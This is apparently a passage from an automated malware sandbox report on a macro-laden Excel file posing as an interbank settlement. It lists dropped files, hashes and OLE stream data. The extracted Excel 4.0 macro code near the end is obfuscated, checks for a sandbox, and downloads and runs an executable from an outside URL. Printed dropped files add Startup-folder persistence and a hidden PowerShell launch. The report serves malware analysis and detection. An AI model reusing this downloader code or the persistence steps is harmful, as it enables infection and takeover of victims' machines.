SHA1:	A2797DED88353E88933F8E181FB04B779390E761
SHA-256:	87434CBE254F6417927D3EC7438E92416B00EE8F354DC68A43B2705F628FF8BE
SHA-512:	2784D41DEC52C02F13C17E6765E0C741AAE2F204C4E3F0B7036E3E99631EA23075AEB1BC7D20402B011CC251A975839C6899D4BB23B9D98FC3EFF4803D0A35F7
Malicious:	false
Reputation:	low
Preview:	@...e.....................K...........2.4............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)a.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\44D40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	228755
Entropy (8bit):	7.982874164570525
Encrypted:	false
SSDEEP:	6144:ukojHNQB2+Uvs6Tu0EA0le7mfFjnmQW/AVc9PA:uZhkpUv30SWmc2PA
MD5:	78BF0B0397A6E75562C0594BFF70118C
SHA1:	1B7682903B7714C42D24F2CC812EAF435129A682
SHA-256:	0414C25D5C90BA60C5B591B0F8F7D34F0D1B11AEF41DFA8FF1C95BF1C9C75844
SHA-512:	4FEDADFDC9B31DEE8623F6ED3BC78398F30CE05347D830867C0215207C0B39D010491B47EA7065375597F55066A49E7E28A3EF1E585F8C39BA60C84D6707043D
Malicious:	false
Preview:	.U.n.0....?.......a........>...[.,...&.?.q.H....%..'.._o{Wm0e.\|#..LT.u0...u...,.L.....;..z....~.1W..s#:..E..;.!.....*..._S.".5..>.f.....SM.C,..p.....-o.,.....w...........7.H.ZY.&..e......z'c.....B..}.i......H..e2G.$G........:.PN..0....L.`u..~@.n..S.!..!..i.bf.k.jtrpL..S..t.g`...#L..ChV...W.........v6.5y.\..'t..;..yN..%.0...v....^...t..........o...&.c.....}..&x7K.M.7j....i?..KX..C.....c...}.'%.....,>O...<Q.\JXF.As.[............PK..........!.._U1....c.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\499262.js Download File
Process:	C:\ProgramData\a.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.040848080507827
Encrypted:	false
SSDEEP:	3:qWlGYox7D/eJDcMj2bMJtnxyxPHkuWAX+Ro6p4E1C5rAuf5yaKXFof1aNFQkeyH:qoq7yJDIUtxyXWDKaJI5lR9ZQqsH
MD5:	D811BEEFA0EB4692BE15EC756BBAFE49
SHA1:	E930135BA7274A80F8C54514EF9AF857EF47226D
SHA-256:	75E457E09D751D547B5EE234BE96403FFED9ECE5D07C5C719B8B0B307F489027
SHA-512:	CC134E3E6A5C9F6ED9BD0CD2D54BB37064D7098F63281B0FCEDBC0B7C59D037E7090AA88B46EBB2EB8F34FCAA9282941F9CEF1E48EABEF8C6B40EF7AD7D2D3DD
Malicious:	false
Preview:	var FSO = WScript.CreateObject("Scripting.FileSystemObject"); try { FSO.MoveFile("C:\\PROGRAMDATA\\a.exe", "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a.exe");} catch(err) {}

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0trfj0zt.2gs.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmghts1r.j24.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.660572663633042
Encrypted:	false
SSDEEP:	12:8XcXUNduCH2BvOn429lte+WrjAZ/DYbDtTSeuSeL44t2Y+xIBjKZm:85qm3tcAZbcDP7aB6m
MD5:	6A09C36C82320F791ECC5CB5ADC94109
SHA1:	7B04B3E55A22C8E57EC7D703C99F50395CA30062
SHA-256:	91DA8A11693569CCC881E89369333E946E8A1703EA61C80C6C438A725CA2DD4D
SHA-512:	DC8660E3B341C81161A32CF94B575F4E62B2D88D0AEA51A72E71D03294C5646227C0CA4DEF7E570E50C3684B78CEB139C26875711031C1463E3995E42C09C79A
Malicious:	false
Preview:	L..................F.............-..PA..Q.......Q.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....VRZ...Desktop.h.......N..VRZ......Y..............>.......^.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LIQUIDACION INTERBANCARIA 02_22_2021.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:54 2020, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=783360, window=hide
Category:	dropped
Size (bytes):	2370
Entropy (8bit):	4.713596692352419
Encrypted:	false
SSDEEP:	48:89qmETt7N8wnDxB6p9qmETt7N8wnDxB6:89ZEZVK9ZEZV
MD5:	CD4FED673703D52A93764B0204B5E15D
SHA1:	A406F3644307BFAF03E79481380193D1D44E83C3
SHA-256:	97EAFE69390987506896844E9C3035E6F84A1CD3FE5BBEECAFE95EA43B0DCF31
SHA-512:	4FD4A8470AE10081DD4839A0266DC968384C9723DC7E5F82DA9B8A3D83644068A41C439E415A7D6E75DC2E7C9C94F616F0C977E3FD311B466AA6C3E7B849E3FA
Malicious:	false
Preview:	L..................F.... ....s.T........Q....D..Q................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..VRM......Y..............>......h..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....VRU. .LIQUID~1.XLS.........>Q\|<VRU......V......................c.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.......n...............-.......m...........>.S......C:\Users\user\Desktop\LIQUIDACION INTERBANCARIA 02_22_2021.xls..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	161
Entropy (8bit):	4.645820606938903
Encrypted:	false
SSDEEP:	3:oyBVomMHvLJ0rmkT46lxaAvLJ0rmkT46lmMHvLJ0rmkT46lv:dj6UTtjaTTtxUTt1
MD5:	618DC56A1C2E874ECEFE016D75912A39
SHA1:	E59AAD8BC8D58CDC964EEA6E53F8984B28CFA4EB
SHA-256:	01F801B1C3886DD726A351A3D1E028F996751D6F45823B4DDD81571F9DD1E6A2
SHA-512:	FFB6D23E8E6E1FFBB9C08EC78B2A7865E787C8CAAC5FB351BD1DF31F3039CE1DA763CB4B04B48972B94A5A7809D90453DE0A4DEA987962F5AEEE48B99FC92841
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\Documents\20210222\PowerShell_transcript.715575.WxOfaCb9.20210222203513.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	5.151442141703947
Encrypted:	false
SSDEEP:	24:BxSAT7vBZRwZx2DOXdBmmuVMJWDHjeTKKjX4CIym1ZJX0BmmuVMAenxSAZ9:BZ3vjqZoONFuLDqDYB1ZOFuoZZ9
MD5:	E8D42F7E2203EC0D4EC7D77177CB8D26
SHA1:	71E6B5B24C6AFC00E0054065D950917AE525C1B4
SHA-256:	3CE51F8AD8E172D7E19760EC05542DB5F1D4EE0F0088B12015CC29198990A68D
SHA-512:	08553CFEAF5B40267FFDF7A70FEB6FB20FEAC6B4798A846BA9231BCB915B2BFD33D4C0C6013E310DBE3A43F6EDAA82304E5FA60BD6ABA4089F926F839AB4D054
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222203528..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..Process ID: 5596..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222203528..******************..PS>Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..********************..Command start time: 2021022220

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Dexter MORGAN, Last Saved By: HP PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 3 22:00:53 2020, Last Saved Time/Date: Mon Feb 22 09:51:33 2021, Security: 0
Entropy (8bit):	7.938164956946986
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
File size:	774656
MD5:	8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:	61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:	35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
SHA512:	f73682a1b16ca4271e711a539a078e266e181ec7bc9927844d285b238e789fe1ca727acce8fc2f6997c0fed163f1777e442fc390529ed96ebdb533adfdea3716
SSDEEP:	12288:27xSO0ZMQQnQ3yUZLUXA2ZGoMxFrYETEwIhMA++KnoGnkp4zL0mJm8gz:27EkznQ3bZIXASFEQwIhMA++LGkp4wmY
File Content Preview:	........................>.......................................................b.......d.......f.......h.......j.......l......................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:	Dexter MORGAN
Last Saved By:	HP PC
Create Time:	2020-12-03 22:00:53
Last Saved Time:	2021-02-22 09:51:33
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Feuil1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Feuil1
VBA File Name:	Feuil1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1a aa 91 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
False
VB_TemplateDerived

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 1142

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	1142
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 0c 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 13 03 00 00 a7 03 00 00 00 00 00 00 01 00 00 00 1a aa 97 8c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.67634243661
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 216

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	216
Entropy:	3.65061706767
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . H P P C . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . * M . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 88 00 00 00 0d 00 00 00 94 00 00 00 13 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 758471

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	758471
Entropy:	7.96834669995
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P P C B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . 2 F C . 8 . . . . . . . X
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 20 50 43 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 501

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	501
Entropy:	5.22430114012
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 7 F 5 5 B 5 6 A 5 B A 9 8 B E 9 8 B E 9 C C 2 9 C C 2 " . . D P B = " E E E C 4 2 6 F C E 9 1 D 8 A E D 8 A E 2 7 5 2
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 56 42

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.11998328335
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2453

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	2453
Entropy:	3.93667032984
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
Data Raw:	cc 61 af 00 00 01 00 ff 0c 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.33446971204
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . K . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4b fc ca 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

;;;;;;;;;;;;;;;"=IF(GET.WORKSPACE(1+18);;CLOSE(TRUE))";;;;"=IF(GET.WORKSPACE(30+12);;CLOSE(TRUE))";;;;;;;;"=IF(ISNUMBER(SEARCH(""32"";GET.WORKSPACE(1)));GOTO(B126);GOTO(C126))";;;=;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""JJCCJJ"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & """"OGRAMDATA\a.""""&CHAR(101)&""""xe"""")""";;;;"EXEC(""C:\""&CHAR(80)&CHAR(82)&""OGRAMDATA\a.""&CHAR(101)&""xe"")";;;;"=CHAR(67)&CHAR(65)&CHAR(76)&CHAR(76)&""(""""ur""""&CHAR(108)&""""mon"""",""""UR""""&CHAR(76)&""""Down""""&CHAR(108)&""""oadToFi""""&CHAR(108)&""""eA"""",""""BBCCBB"""",0,CHAR(104)&""""ttps://www.seyranikenger.com.tr/mensajeria_system.exe"""",""""C:\"""" & Char(80) & Char(82) & 